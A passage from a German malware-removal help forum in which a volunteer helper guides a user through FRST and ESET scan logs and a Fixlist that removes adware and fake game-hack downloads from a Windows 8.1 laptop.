==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run: => "Samsung Link"
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Registry Helper"
HKLM\...\StartupApproved\Run32: => "fst_de_19"
HKLM\...\StartupApproved\Run32: => "t4pc_en_3"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.
Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) 
C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe FirewallRules: [{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe 
FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe 
FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe ==================== Wiederherstellungspunkte ========================= 22-03-2016 02:55:07 JRT Pre-Junkware Removal 29-03-2016 12:45:27 Windows Modules Installer 30-03-2016 12:51:51 Revo Uninstaller's restore point - Google Chrome ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 02:07:55 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 02:07:55 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 02:07:55 PM) (Source: Microsoft-Windows-AppModel-State) 
(EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 01:55:00 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 01:55:00 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/30/2016 01:55:00 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Systemfehler: ============= Error: (03/30/2016 01:43:18 PM) (Source: Service Control Manager) (EventID: 7030) (User: ) Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren. Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: ) Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren. Error: (03/30/2016 01:43:17 PM) (Source: Service Control Manager) (EventID: 7030) (User: ) Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren. Error: (03/30/2016 01:43:16 PM) (Source: Service Control Manager) (EventID: 7030) (User: ) Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren. 
Error: (03/30/2016 01:43:16 PM) (Source: Service Control Manager) (EventID: 7030) (User: ) Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren. Error: (03/30/2016 08:19:16 AM) (Source: BTHUSB) (EventID: 17) (User: ) Description: Der lokale Bluetooth-Adapter ist aus einem unbekannten Grund fehlgeschlagen und wird nicht verwendet. Der Treiber wurde entladen. Error: (03/29/2016 06:40:53 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet: %%1062 Error: (03/29/2016 06:40:35 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: %%1056 Error: (03/29/2016 06:40:06 PM) (Source: Service Control Manager) (EventID: 7006) (User: ) Description: Der Aufruf "ScRegSetValueExW" ist für "DeleteFlag" aufgrund folgenden Fehlers fehlgeschlagen: %%5 Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: ) Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen: %%5 CodeIntegrity: =================================== Date: 2016-01-27 20:34:50.024 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:33:27.259 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. 
Date: 2016-01-27 20:31:32.120 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:31.842 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:21.532 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:21.366 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:19.557 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:13.438 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:00.333 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. 
Date: 2016-01-27 20:31:00.166 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. ==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz Prozentuale Nutzung des RAM: 34% Installierter physikalischer RAM: 3971.27 MB Verfügbarer physikalischer RAM: 2611.04 MB Summe virtueller Speicher: 8067.27 MB Verfügbarer virtueller Speicher: 5926.15 MB ==================== Laufwerke ================================ Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:392.05 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D) Partition: GPT. ==================== Ende von Addition.txt ============================ |
30.03.2016, 14:04 | #9 |
/// Malwareteam | MPC Cleaner cannot be deleted (malware) No, this is a Chrome-specific problem, so only do it with Chrome.
__________________ Regards, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ |
30.03.2016, 15:55 | #10 |
| MPC Cleaner cannot be deleted (malware) Hello Rafael, OK, I hardly paid any attention to Chrome during my "clean-up attempts", since I never use it. I will now wait for your verdict and hope that this is settled; at least so far I have the impression that the problems no longer occur. If you have a tip on which program I could use in future to avoid the problem, I would be very grateful. |
30.03.2016, 22:17 | #11 |
/// Malwareteam | MPC Cleaner cannot be deleted (malware) So, as I said, your Chrome, or what is left of it, is broken. It may be that Chrome is not offered for uninstallation at all; in that case install Chrome over it and then continue with the complete uninstallation described above. We are almost done: ESET Online Scanner
Note: This scan can take several hours...
|
31.03.2016, 01:53 | #12 |
| MPC Cleaner cannot be deleted (malware) Chrome is uninstalled, and so is ESET, as per the instructions. Here are the results from ESET: Code:
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=5efff497f84dc54380e17e1ad7778ee9
# end=init
# utc_time=2016-03-30 09:52:56
# local_time=2016-03-30 11:52:56 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28827
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=5efff497f84dc54380e17e1ad7778ee9
# end=updated
# utc_time=2016-03-30 09:59:16
# local_time=2016-03-30 11:59:16 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=5efff497f84dc54380e17e1ad7778ee9
# engine=28827
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-03-31 12:44:52
# local_time=2016-03-31 02:44:52 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.2.9200 NT
# compatibility_mode_1='Avira Antivirus'
# compatibility_mode=1815 16777213 100 100 10468 32794980 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 5726438 23174662 0 0
# scanned=407792
# found=16
# cleaned=0
# scan_time=9936
sh=591176C07CA0FB5EF209BD67D8CCCD2CAF18390C ft=1 fh=266304c574081d8f vn="Variante von Win32/ELEX.HI evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\bugreport.exe.vir"
sh=767505D6B728170EFF73BC34BED8D234397602F3 ft=1 fh=a76b10b008294658 vn="Variante von Win32/ELEX.HI evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\ccuter.exe.vir"
sh=D8CB5CDA4304EDEA8B87300762C7B545A56A6969 ft=1 fh=9069b0f7bfa29111 vn="Variante von Win32/ELEX.HI evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\ffuter.exe.vir"
sh=BFA5BA61ACE80984FE53B88C10F8ECB1B32883A4 ft=1 fh=2d3f97d88a4a71b9 vn="Variante von Win32/ELEX.HH evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\Winsere.exe.vir"
sh=BFA5BA61ACE80984FE53B88C10F8ECB1B32883A4 ft=1 fh=2d3f97d88a4a71b9 vn="Variante von Win32/ELEX.HH evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\Winsere\Winsere\Winsere.exe.vir"
sh=B7E2FB810C0D71AF84782A0B64600A68E46C7776 ft=1 fh=7b64b17d945551a5 vn="Variante von Win32/ELEX.HH evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe.vir"
sh=E0BA599048B8C2B518CF3D262C13FD4B69BEB832 ft=0 fh=0000000000000000 vn="Win32/AztecMedia.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Denny\AppData\Local\Chromium\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\newtab.html.vir"
sh=618159FBD13DC5C93638F7903755BB2211302704 ft=1 fh=8340d79ae02c1341 vn="Variante von Win32/Goobzo.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Denny\AppData\Local\DeskBar\dblaunch.exe.vir"
sh=66EC0DA71D8BF807D474ADC9D71BD32EA4EDC955 ft=1 fh=0655fb80a68ddc6c vn="Variante von MSIL/Goobzo.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Denny\AppData\Local\DeskBar\3.1.0.1866\DeskBar.exe.vir"
sh=C81214BEF922A09B347F10ECAD857635E78B175A ft=1 fh=70f34604069d89e9 vn="Variante von Win64/Packed.Komodia.A verdächtige Datei" ac=I fn="C:\AdwCleaner\FileQuarantine\C\WINDOWS\SysNative\LavasoftTcpService64.dll.vir"
sh=0AA495433A70EB588E5157F44909D284DB405766 ft=1 fh=fc7510d09bb476bc vn="Variante von Win32/Packed.Komodia.A verdächtige Datei" ac=I fn="C:\AdwCleaner\FileQuarantine\C\WINDOWS\SysWOW64\lavasofttcpservice.dll.vir"
sh=4AE3131FD38BF2C958731E6593FBD3EF0A70B75F ft=0 fh=0000000000000000 vn="Mehrere Bedrohungen" ac=I fn="C:\temp\InstallFilter64.msi"
sh=E9C749B477FA6532635B76A153BEAD42D71B4445 ft=1 fh=fd8655f004102309 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe"
sh=4FA8EDA7528058B7653D10056AB06C64C3A7E2C8 ft=1 fh=1a3598f4991d26e2 vn="MSIL/Hoax.FakeHack.FA Anwendung" ac=I fn="C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe"
sh=4FA8EDA7528058B7653D10056AB06C64C3A7E2C8 ft=1 fh=1a3598f4991d26e2 vn="MSIL/Hoax.FakeHack.FA Anwendung" ac=I fn="C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe"
sh=8D1D10262B79E8EBD3CBFD1904BB5F0E7DCF9723 ft=1 fh=a7059d22de5954b2 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe"
|
31.03.2016, 11:17 | #13 |
/// Malwareteam | MPC Cleaner cannot be deleted (malware)
Step 1: Press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document:
Code:
C:\temp\InstallFilter64.msi
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe
emptytemp:
Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
Step 2: Please start FRST again, tick the Addition box and press "Untersuchen" (Scan). Please post the two resulting text files again. If that looks fine, we are as good as done.
|
31.03.2016, 11:57 | #14 |
| MPC Cleaner cannot be deleted (malware) Hello Rafael, I do hope this will be settled soon; I am slowly getting a guilty conscience about taking up so much of your time. Here are the results: Fixlog: Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-31 12:29:11) Run:2
Gestartet von C:\Users\Denny\Desktop
Geladene Profile: Denny & (Verfügbare Profile: Denny & Administrator)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
C:\temp\InstallFilter64.msi
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe
emptytemp:
*****************
C:\temp\InstallFilter64.msi => erfolgreich verschoben
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack (1).exe => erfolgreich verschoben
C:\Users\Denny\Downloads\Hay_Day_Diamond_Hack.exe => erfolgreich verschoben
EmptyTemp: => 35.9 MB temporäre Dateien entfernt.
Das System musste neu gestartet werden.
==== Ende von Fixlog 12:29:18 ====
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01 durchgeführt von Denny (Administrator) auf SCHNEIDER (31-03-2016 12:39:25) Gestartet von C:\Users\Denny\Desktop Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator) Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser nicht gefunden!) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe (SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe (SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe 
(Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel Corporation) C:\Windows\System32\igfxTray.exe (Microsoft Corporation) C:\Windows\System32\SkyDrive.exe (Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe 